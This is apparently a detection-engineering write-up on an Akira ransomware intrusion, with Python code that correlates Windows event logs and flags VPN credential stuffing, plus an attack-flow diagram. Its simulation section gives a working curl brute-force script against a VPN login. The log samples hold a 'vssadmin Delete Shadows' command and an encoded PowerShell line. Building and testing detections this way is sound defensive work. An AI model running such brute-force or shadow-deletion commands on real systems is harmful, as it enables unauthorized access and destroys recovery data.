Tracing an Akira Ransomware Kill Chain Through Perimeter and Endpoint Logs
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
The article describes a recent intrusion linked to the Akira ransomware operation. The attackers obtained initial access by brute-forcing a disabled local SSL VPN account, then moved on to credential discovery, Kerberoasting, and lateral movement over RDP. Before launching encryption, they cleared logs and removed shadow copies. Notably, the entire sequence was visible through firewall syslog data and Windows EVTX logs, without relying on endpoint detection tooling. The report highlights how combining perimeter and endpoint telemetry can expose ransomware activity in its early stages.
Investigation
The investigation relied exclusively on SSL VPN firewall logs and Windows event log exports gathered from domain controllers and member servers. Event IDs including 4624, 4688, 4769, 1102, and 7036 were correlated to reconstruct the complete kill chain from initial access through final impact. The observed techniques included credential stuffing, domain discovery, Kerberoasting, RDP authentication, log clearing, and shadow copy deletion. No memory images or EDR telemetry were needed to map the intrusion.
Mitigation
The report recommends tightening remote access security, enforcing MFA, removing disabled accounts from firewall access lists, and strengthening authentication lockout policies. It also advises enabling detailed process auditing with Event ID 4688 across all systems, increasing security log retention, and forwarding critical logs to external storage. Detection content should specifically cover RC4-based Kerberos tickets, vssadmin shadow copy deletion, and unexpected PowerShell commands using -EncodedCommand. Consistent time synchronization across infrastructure is also essential for reliable correlation.
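The correlation described in the Investigation section (Event IDs 4624, 4688, 4769, 1102 and 7036 stitched into one timeline) and the detection content recommended above (RC4 Kerberos tickets, vssadmin shadow-copy deletion, PowerShell -EncodedCommand) can be shown together as one small correlator. This is an added example, not code from the original report: the event records are constructed to resemble an EVTX-to-JSON export, and the field names (TicketEncryptionType, LogonType, CommandLine, param1/param2 for 7036) together with the host and account names are assumptions.

```python
"""Correlate exported Windows events into a kill-chain timeline.

Added example, not code from the original report. The records below are
constructed to look like an EVTX-to-JSON export: the field names follow the
EventData names of the Security log (TicketEncryptionType, LogonType,
CommandLine, ...) and param1/param2 of the System log's 7036 event; the exact
export layout is an assumption.
"""
import base64
import re
from datetime import datetime

TS_FMT = "%Y-%m-%dT%H:%M:%SZ"
ENCODED_FLAG = "encodedcommand"
VSS_DELETE_RE = re.compile(r"vssadmin(\.exe)?\s+delete\s+shadows", re.IGNORECASE)

# Constructed sample events (not real telemetry); hosts and accounts are made up.
_ENC = base64.b64encode("Get-ADUser -Filter *".encode("utf-16le")).decode()
EVENTS = [
    {"time": "2024-05-01T02:10:05Z", "host": "DC01", "id": 4769,
     "ServiceName": "svc_sql", "TicketEncryptionType": "0x17",
     "TargetUserName": "jdoe@CORP.LOCAL", "IpAddress": "10.0.5.20"},
    {"time": "2024-05-01T02:10:06Z", "host": "DC01", "id": 4769,
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x12",
     "TargetUserName": "jdoe@CORP.LOCAL", "IpAddress": "10.0.5.20"},
    {"time": "2024-05-01T02:41:30Z", "host": "SRV02", "id": 4624,
     "LogonType": "10", "TargetUserName": "svc_sql", "IpAddress": "10.0.5.20"},
    {"time": "2024-05-01T02:45:12Z", "host": "SRV02", "id": 4688,
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + _ENC},
    {"time": "2024-05-01T03:01:00Z", "host": "SRV02", "id": 7036,
     "param1": "ExampleEndpointAgent", "param2": "stopped"},
    {"time": "2024-05-01T03:02:44Z", "host": "SRV02", "id": 1102,
     "SubjectUserName": "svc_sql"},
    {"time": "2024-05-01T03:05:01Z", "host": "SRV02", "id": 4688,
     "NewProcessName": r"C:\Windows\System32\vssadmin.exe",
     "CommandLine": "vssadmin.exe Delete Shadows /All /Quiet"},
    {"time": "2024-05-01T03:05:10Z", "host": "SRV02", "id": 4688,
     "NewProcessName": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]


def encoded_command_payload(cmdline):
    """Decode the script passed via -EncodedCommand (or any prefix PowerShell
    accepts, such as -e or -enc); return None when the flag is absent."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        body = tok[1:].lower()
        if tok.startswith("-") and body and ENCODED_FLAG.startswith(body):
            try:
                return base64.b64decode(tokens[i + 1]).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def classify(event):
    """Map one event to a (phase, detail) finding, or None if it is benign."""
    eid = event["id"]
    if eid == 4769:
        svc = event.get("ServiceName", "")
        # RC4 (0x17) service tickets for accounts other than krbtgt and computers
        if (event.get("TicketEncryptionType", "").lower() == "0x17"
                and svc.lower() != "krbtgt" and not svc.endswith("$")):
            return ("Credential Access",
                    f"RC4 service ticket for {svc} requested by "
                    f"{event.get('TargetUserName')} from {event.get('IpAddress')}")
    elif eid == 4624 and event.get("LogonType") == "10":  # RemoteInteractive = RDP
        return ("Lateral Movement",
                f"RDP logon as {event.get('TargetUserName')} from {event.get('IpAddress')}")
    elif eid == 4688:
        cmd = event.get("CommandLine", "")
        if VSS_DELETE_RE.search(cmd):
            return ("Impact", f"shadow copy deletion: {cmd}")
        if "powershell" in event.get("NewProcessName", "").lower():
            payload = encoded_command_payload(cmd)
            if payload is not None:
                return ("Execution", f"encoded PowerShell decodes to: {payload}")
    elif eid == 1102:
        return ("Defense Evasion", f"Security log cleared by {event.get('SubjectUserName')}")
    elif eid == 7036 and event.get("param2", "").lower() == "stopped":
        return ("Defense Evasion", f"service {event.get('param1')} entered the stopped state")
    return None


def build_timeline(events):
    """Return findings as (time, host, phase, detail) tuples in time order."""
    findings = []
    for ev in events:
        hit = classify(ev)
        if hit is not None:
            findings.append((ev["time"], ev["host"], hit[0], hit[1]))
    findings.sort(key=lambda f: datetime.strptime(f[0], TS_FMT))
    return findings


if __name__ == "__main__":
    for time, host, phase, detail in build_timeline(EVENTS):
        print(f"{time} {host:<6} {phase:<18} {detail}")
```

The Kerberoasting check deliberately ignores krbtgt and computer accounts (names ending in `$`), which otherwise dominate 4769 volume; the encoded-command check accepts any prefix of `-EncodedCommand` because powershell.exe does, so matching only the full flag name would miss `-enc` or `-e`. The timeline sort is what makes the clock-synchronisation point in the report matter: hosts with skewed clocks put findings in the wrong order.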
Response
When any of the identified indicators appear, responders should immediately isolate the compromised VPN account and quarantine affected systems. Relevant firewall and EVTX logs should be preserved, credentials reset, compromised accounts disabled, and shadow copies restored from clean backups where available. A full forensic review should then be performed to identify any additional persistence or follow-on activity, while ransomware response procedures are activated. Stakeholders should be informed promptly, and public disclosure should be considered where required.
Attack Flow

```mermaid
graph TB
    %% Class definitions
    classDef phase fill:#ffcc99
    classDef tool fill:#c2f0c2

    %% Node definitions
    phase_initial_access["<b>Phase</b> – Initial Access<br/><b>Technique</b> – T1133 External Remote Services<br/><b>Description</b>: Credential stuffing against SSL VPN using compromised local account."]
    class phase_initial_access phase
    tech_valid_accounts["<b>Technique</b> – T1078 Valid Accounts<br/><b>Description</b>: Use of stolen credentials to log into the VPN."]
    class tech_valid_accounts phase
    phase_discovery["<b>Phase</b> – Discovery<br/><b>Technique</b> – T1482 Domain Trust Discovery<br/><b>Description</b>: Enumerate domain trusts using nltest."]
    class phase_discovery phase
    tech_account_discovery["<b>Technique</b> – T1087 Account Discovery<br/><b>Description</b>: Enumerate groups and users via net.exe and whoami."]
    class tech_account_discovery phase
    phase_credential_access["<b>Phase</b> – Credential Access<br/><b>Technique</b> – T1558.003 Kerberoasting<br/><b>Description</b>: Request RC4 service tickets to crack service account passwords."]
    class phase_credential_access phase
    phase_lateral_movement["<b>Phase</b> – Lateral Movement<br/><b>Technique</b> – T1021.001 Remote Services Remote Desktop Protocol<br/><b>Description</b>: Use RDP to move laterally to servers and domain controllers."]
    class phase_lateral_movement phase
    phase_persistence["<b>Phase</b> – Persistence and Privilege Escalation<br/><b>Technique</b> – T1136 Create Account<br/><b>Description</b>: Create a new service account in a non-default OU and add it to privileged groups."]
    class phase_persistence phase
    phase_execution["<b>Phase</b> – Execution<br/><b>Technique</b> – T1059.001 PowerShell<br/><b>Description</b>: Run PowerShell scripts with -EncodedCommand.<br/><b>Technique</b> – T1059.003 Windows Command Shell<br/><b>Description</b>: Use cmd.exe for various commands."]
    class phase_execution phase
    phase_defense_evasion["<b>Phase</b> – Defense Evasion<br/><b>Technique</b> – T1070.001 Clear Windows Event Logs<br/><b>Description</b>: Clear Windows event logs.<br/><b>Technique</b> – T1562 Impair Defenses<br/><b>Description</b>: Stop security services using sc.exe or net stop."]
    class phase_defense_evasion phase
    phase_impact["<b>Phase</b> – Impact<br/><b>Technique</b> – T1490 Inhibit System Recovery<br/><b>Description</b>: Delete shadow copies with vssadmin.<br/><b>Technique</b> – T1565.001 Stored Data Manipulation<br/><b>Description</b>: Encrypt files on disk."]
    class phase_impact phase
    tool_ssl_vpn["<b>Tool</b> – SSL VPN client"]
    class tool_ssl_vpn tool
    tool_nltest["<b>Tool</b> – nltest utility"]
    class tool_nltest tool
    tool_net["<b>Tool</b> – net.exe utility"]
    class tool_net tool
    tool_whoami["<b>Tool</b> – whoami command"]
    class tool_whoami tool
    tool_powershell["<b>Tool</b> – PowerShell"]
    class tool_powershell tool
    tool_cmd["<b>Tool</b> – cmd.exe"]
    class tool_cmd tool
    tool_sc["<b>Tool</b> – sc.exe command"]
    class tool_sc tool
    tool_vssadmin["<b>Tool</b> – vssadmin utility"]
    class tool_vssadmin tool

    %% Connections showing flow
    phase_initial_access -->|leads to| tech_valid_accounts
    tech_valid_accounts -->|leads to| phase_discovery
    phase_discovery -->|leads to| tech_account_discovery
    tech_account_discovery -->|leads to| phase_credential_access
    phase_credential_access -->|leads to| phase_lateral_movement
    phase_lateral_movement -->|leads to| phase_persistence
    phase_persistence -->|leads to| phase_execution
    phase_execution -->|leads to| phase_defense_evasion
    phase_defense_evasion -->|leads to| phase_impact

    %% Tool usage edges
    phase_initial_access -->|uses| tool_ssl_vpn
    phase_discovery -->|uses| tool_nltest
    phase_discovery -->|uses| tool_net
    phase_discovery -->|uses| tool_whoami
    phase_execution -->|uses| tool_powershell
    phase_execution -->|uses| tool_cmd
    phase_defense_evasion -->|uses| tool_sc
    phase_impact -->|uses| tool_vssadmin
```
Detections
- Possible Admin Account or Group Enumeration (via cmdline)
- Possible Account or Group Enumeration / Manipulation (via cmdline)
- Suspicious Domain Trusts Discovery (via cmdline)
- Suspicious VSSADMIN Activity (via cmdline)
- Detection of RDP-Based Lateral Movement and Domain-Level Privilege Escalation [Microsoft Windows Security Event Log]
- Detection of SSLVPN Brute Force and Credential Stuffing [Firewall]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
Attack Narrative & Commands:
- Reconnaissance (T1087): The attacker enumerates usernames from a compromised internal system and builds a credential‑stuffing list (e.g., users.txt).
- Brute‑Force Loop (T1021.001 / T1078.001): Using a compromised external IP range belonging to a known hosting provider (e.g., 203.0.113.45), the attacker launches a rapid series of failed SSLVPN authentication attempts (≥ 50) within one hour. Each attempt uses a different password from the list, targeting a single victim account.
- Successful Credential Stuffing: After exhausting the list, a correct password is found; the attacker logs in successfully from the same IP, satisfying the “successful_auth” clause.
- Evasion (Optional – T1070.001): The attacker clears the Security log on the VPN appliance after the successful login to hide traces (not covered by this rule).
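The firewall-side rule this narrative is written to trigger (at least 50 failed SSLVPN authentications from one source address against one account within an hour, then a successful authentication from the same address) can be expressed as a sliding-window correlation over syslog. The following is an added example, not the page's rule or any vendor's log format: the syslog line layout, the host name fw01, and every address and account name are constructed for the example, and the "unrelated line" shows that non-matching records are skipped rather than breaking the parse.

```python
"""Flag SSLVPN credential stuffing in firewall syslog: >= 50 failed logons from
one source address against one account within an hour, followed by a
successful logon from that address.

Added example, not the page's rule or any vendor's log format. The syslog
line layout below, the host name fw01 and every address and account are
constructed for the example.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

TS_FMT = "%Y-%m-%dT%H:%M:%SZ"
FAILURE_THRESHOLD = 50
WINDOW = timedelta(hours=1)

# Assumed line layout: "<ts> <fw> sslvpn: user=<u> src=<ip> result=<success|failure>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) sslvpn: user=(?P<user>\S+) "
    r"src=(?P<src>\S+) result=(?P<result>success|failure)$"
)


def parse_line(line):
    """Return the parsed fields as a dict, or None for lines that do not match."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    fields = m.groupdict()
    fields["ts"] = datetime.strptime(fields["ts"], TS_FMT)
    return fields


def detect_credential_stuffing(lines):
    """Sliding-window correlation keyed on (source address, account)."""
    failures = defaultdict(deque)  # key -> failure timestamps, oldest first
    alerts = []
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        key = (ev["src"], ev["user"])
        window = failures[key]
        # Drop failures that fell out of the one-hour window.
        while window and ev["ts"] - window[0] > WINDOW:
            window.popleft()
        if ev["result"] == "failure":
            window.append(ev["ts"])
        elif len(window) >= FAILURE_THRESHOLD:
            alerts.append({"src": ev["src"], "user": ev["user"],
                           "failures": len(window),
                           "success_at": ev["ts"].strftime(TS_FMT)})
            window.clear()  # one alert per burst
    return alerts


def make_lines(src, user, n_failures, spacing_s, success_after_s,
               start=datetime(2024, 5, 1, 1, 0, 0)):
    """Construct n_failures failures spacing_s apart, then one success."""
    def line(offset_s, result):
        ts = (start + timedelta(seconds=offset_s)).strftime(TS_FMT)
        return f"{ts} fw01 sslvpn: user={user} src={src} result={result}"
    lines = [line(i * spacing_s, "failure") for i in range(n_failures)]
    lines.append(line(success_after_s, "success"))
    return lines


# Constructed sample stream: a 55-attempt burst that ends in a successful logon,
# a user who mistypes a password three times (must not alert), and one
# unrelated syslog line that the parser has to skip.
SAMPLE_LINES = sorted(
    make_lines("203.0.113.45", "victim_user", 55, 1, 60)
    + make_lines("198.51.100.7", "alice", 3, 1, 30)
    + ["2024-05-01T01:00:30Z fw01 kernel: unrelated line"]
)


if __name__ == "__main__":
    for alert in detect_credential_stuffing(SAMPLE_LINES):
        print(alert)
```

Keying on the (source, account) pair is what separates stuffing of one account from a password spray across many accounts; a spray rule would key on the source alone and count distinct accounts. The window is cleared after an alert so a long burst produces one alert rather than one per subsequent success, and attempts spread over more than an hour never reach the threshold, which is the gap the report's advice on lockout policy is meant to close.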
Regression Test Script: Bash script leveraging curl (works on a Linux attacker box). Adjust the variables for the real environment.

```bash
#!/usr/bin/env bash
# ------------------------------------------------------------------
# Simulate SSLVPN brute‑force / credential stuffing to trigger Sigma rule
# ------------------------------------------------------------------
VPN_ENDPOINT="https://vpn.example.com/remote/auth"
USERNAME="victim_user"
PASSWORD_LIST="passwords.txt"   # one password per line
SOURCE_IP="203.0.113.45"        # must be routable to the VPN

# Function to perform a single login attempt
attempt_login() {
    local pwd="$1"
    # Using --silent to avoid clutter; --write-out to capture HTTP code
    curl --silent --output /dev/null --write-out "%{http_code}" \
        --user "$USERNAME:$pwd" "$VPN_ENDPOINT"
}

# 1. Generate 55 failed attempts (rate ~1/sec)
echo "Starting failed attempts..."
count=0
while IFS= read -r pwd && [ "$count" -lt 55 ]; do
    http_code=$(attempt_login "$pwd")
    echo "Attempt $((count+1)): HTTP $http_code (expected 401)"
    ((count++))
    sleep 1   # keep within 1‑hour window
done < "$PASSWORD_LIST"

# 2. Successful login with correct password (assume last line in file)
echo "Performing successful login..."
correct_pwd=$(tail -n1 "$PASSWORD_LIST")
http_code=$(attempt_login "$correct_pwd")
echo "Successful attempt: HTTP $http_code (expected 200)"
echo "Simulation complete."
```
Cleanup Commands: Remove any temporary files and reset firewall rate‑limiting (if altered).

```bash
#!/usr/bin/env bash
# Cleanup after SSLVPN brute‑force simulation

# Delete the temporary password list if it was created on‑the‑fly
if [ -f passwords.txt ]; then
    shred -u passwords.txt
    echo "Deleted passwords.txt"
fi

# Optionally, reset any temporary iptables rules used for testing
sudo iptables -D INPUT -s 203.0.113.45 -j DROP 2>/dev/null || true
echo "Cleanup finished."
```